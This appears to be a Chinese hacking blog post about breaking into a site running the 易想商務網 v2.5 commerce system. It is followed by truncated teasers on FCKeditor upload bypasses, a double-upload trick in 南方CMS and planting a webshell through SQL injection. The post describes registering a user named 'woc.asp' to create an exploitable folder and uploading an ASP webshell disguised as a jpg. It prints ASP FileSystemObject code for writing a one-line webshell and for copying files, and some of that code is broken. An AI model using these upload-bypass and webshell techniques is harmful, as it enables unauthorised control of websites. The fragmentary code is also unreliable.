開啟目標站點看了一下用的是易想商務網慧聰網風格v2.5 的商務建站系統!
隨手看了一下,用nc提交註冊乙個使用者名為woc.asp的使用者名稱。系統會自動新建乙個以使用者名為命名的資料夾
然後來到相簿管理,上傳乙個改字尾為jpg的asp大馬。本來以為秒了
尼瑪的,不給力
給攔截了,百思不其解,心想可能這馬加密不夠,蛋疼的拖來乙個合併的一句話
可還是給攔截了,於是抓包看了一下上傳位址的url
/inc/upload.asp?tmode=8&istwo=1&utype=vipinfo&guser=woc.asp
在這裡我先列出我用到的相關**
1.fso生成一句話**
dim content,fso,fout
set fso=server.createobject("scripting.filesystemobject")
fout.writeline""
fout.write content
fout.close
set fout=nothing
set fso=nothing
%>
call copyfiles(tempsource,tempend)
function copyfiles(tempsource,tempend)
dim fso
set fso = server.createobject("scripting.filesystemobject")
if fso.fileexists(tempend) then
response.write "目標備份檔案" & tempend & "已存在,請先刪除!"
set fso=nothing
exit function
end if
if fso.fileexists(tempsource) then
else
response.write "要複製的源資料檔案"&tempsource&"不存在!"
set fso=nothing
exit function
end if
fso.copyfile tempsource,tempend
response.write "已經成功複製檔案"&tempsource&"到"&tempend&""
fckeditor上傳 變 突破
有很多已經修補過的fckeditor 我們上傳x.asp y.jpg的時候 通常會變成x asp y.jpg 讓我們的馬失效 利用二次上傳 可以 生成x 2 asp y.jpg 可以突破 有些時候打了補丁的 讓我們還是無法突破 通常 我們在www.2cto.com editor fckeditor ...
雙檔案上傳突破利用
這個漏洞在南方cms 上出現的 主要是上傳時候利用bp抓包 然後滑鼠右鍵吧資料報傳送到repeater模組 找到你上傳的包內容 一般是 61234564788 content disposition form data name filename filename 1.png 內容 61234564...
突破SQL錯誤提示上傳webshell
得到sql注入點,首先想到的是backup webshell,扔在nb裡跑一圈,發現遮蔽了sql錯誤資訊,得不到物理路徑,那還寫個pp馬了.聯想到乙個許可權不是很高的命令openrowset,進行跨庫伺服器查詢,就是把乙個sql命令傳送到遠端資料庫,然後看返回的結果,但是要啟動事件跟蹤 我們可以把 ...